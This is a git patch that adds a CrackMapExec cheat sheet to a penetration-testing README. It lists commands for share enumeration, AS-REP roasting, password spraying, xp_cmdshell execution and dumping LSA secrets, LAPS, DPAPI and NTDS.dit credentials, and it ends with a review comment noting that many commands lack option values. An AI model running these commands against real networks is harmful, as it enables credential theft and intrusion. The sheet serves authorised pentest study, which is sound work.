From 923461ebd32d2b8d7c4d369f6fc120abc90eaefd Mon Sep 17 00:00:00 2001 From: Ahmed Amine <55143192+seriotonctf@users.noreply.github.com> Date: Fri, 1 Sep 2023 12:30:29 +0100 Subject: [PATCH] added crackmapexec cheat sheet --- README.md | 140 ++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 140 insertions(+) diff --git a/README.md b/README.md index ea3cdc0..453b362 100644 --- a/README.md +++ b/README.md 
@@ -731,6 +731,146 @@ Get Hashes bash$ cme smb -u username -p password --sam ``` +## CrackMapExec Cheat Sheet +### Initial Enumeration +```bash +crackmapexec smb +``` + +### Testing null/guest authentication and listing shares +```bash +crackmapexec smb targets.txt -u '' -p '' --shares +``` + +```bash +crackmapexec smb targets.txt -u 'Guest' -p '' --shares +``` + +### Enumerate users using ldap +```bash +crackmapexec ldap -u '' -p '' --users +``` + +```bash +crackmapexec ldap -u users.txt -p "" -k +``` + +### Asreproast +```bash +crackmapexec ldap -u -p "" --asreproast asrep.txt +``` + +### Bloodhound +```bash +crackmapexec ldap -u -p --bloodhound -ns --collection All +``` + +### Group Policy Preferences +- https://www.thehacker.recipes/ad/movement/credentials/dumping/group-policies-preferences +```bash +crackmapexec smb -u -p -M gpp_password +``` + +### Creds Spray +```bash +crackmapexec smb targets.txt -u -p +``` + +### Password Spray +```bash +crackmapexec ldap -u users.txt -p --continue-on-success +``` + +```bash +crackmapexec ldap -u users.txt -p --no-bruteforce --continue-on-success +``` + +### STATUS_NOT_SUPPORTED: NTLM protocol not supported +In this case we can use the `-k` option which will use Kerberos protocol to authenticate. 
+```bash +crackmapexec smb targets.txt -u -p -k +``` + +### List shares +```bash +crackmapexec smb targets.txt -u -p -k --shares +``` + +### Spider_plus Module +The module `spider_plus` allows you to list and dump all files from all readable shares +#### List all readable files +```bash +crackmapexec smb -u -p -k -M spider_plus +``` + +#### Dump all files +```bash +crackmapexec smb -u -p -M spider_plus -o READ_ONLY=false +``` + +#### Dump a specific file +```bash +crackmapexec smb -u -p -k --get-file --share +``` + + +### MSSQL +#### Test authentication +```bash +crackmapexec mssql targets.txt -u -p +``` + +#### Execute commands using `xp_cmdshell` +- `-X` for powershell and `-x` for cmd +```bash +crackmapexec mssql -u -p -X +``` + +#### Get a file +```bash +crackmapexec mssql -u -p --get-file +``` + +### Local Administrator authentication +```bash +crackmapexec smb -u -p --local-auth +``` + +### Dump the LSA secrets +```bash +crackmapexec smb -u -p --local-auth --lsa +``` + +### Recover the name of the gmsa account +- https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-5-golden-gmsa-trust-attack-from-child-to-parent +We have two possibilities to recover the name of the gmsa account: +- Using the `--gmsa-convert-id` option: +```bash +crackmapexec ldap -u -p --gmsa-convert-id +``` +- Decrypt the gmsa account in lsa with `--gmsa-decrypt-lsa`: +```bash +crackmapexec ldap -u -p --gmsa-decrypt-lsa +``` + +### Dump LAPS password +```bash +crackmapexec smb targets.txt -u -p --laps +``` + +### Dump the credentials of the dpapi +```bash +crackmapexec smb targets.txt -u -p --laps --dpapi +``` + +### Dump NTDS.dit +```bash +crackmapexec smb -u -p --ntds +``` + +### References +- https://github.com/mpgn/CrackMapExec +- https://wiki.porchetta.industries/smb-protocol/scan-for-vulnerabilities ## Crackmapexec to Empire agent
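Review bot: Most of the added commands are not runnable as written because the option values were left empty, e.g. `crackmapexec smb targets.txt -u -p -k`, `crackmapexec ldap -u -p "" --asreproast asrep.txt` and `crackmapexec smb -u -p -k --get-file --share`; with no value after `-u`, the parser will either consume the next flag as the username or error out, and a reader cannot tell which token is the user, the password, the target, or the `--get-file` source/destination or share. The existing section just above the hunk already uses explicit placeholders (`cme smb -u username -p password --sam`, with a `bash$` prompt and the `cme` alias), so the new section should follow that convention: `crackmapexec smb targets.txt -u '<user>' -p '<password>' -k`, and likewise `-ns <dc-ip>`, `--gmsa-convert-id <id>`, `--gmsa-decrypt-lsa <lsa-line>`, and a target host on the lines that have none (`crackmapexec smb`, `crackmapexec smb -u -p --ntds`). Two smaller points in the same hunk: under "Dump the credentials of the dpapi", `crackmapexec smb targets.txt -u -p --laps --dpapi` carries `--laps` over from the preceding LAPS command; if the intent is to authenticate with the LAPS password before dumping DPAPI, the heading should say so, otherwise drop `--laps`. And "Creds Spray" (smb, empty `-u -p`) and "Password Spray" (ldap, `users.txt` with `--continue-on-success`) describe the same technique; merging them under one heading, or stating why one uses smb and the other ldap, would make the sheet clearer. Next to the `STATUS_NOT_SUPPORTED` tip it would also help to note that the `-k` commands need resolvable hostnames rather than bare IPs, since Kerberos tickets are bound to the service name.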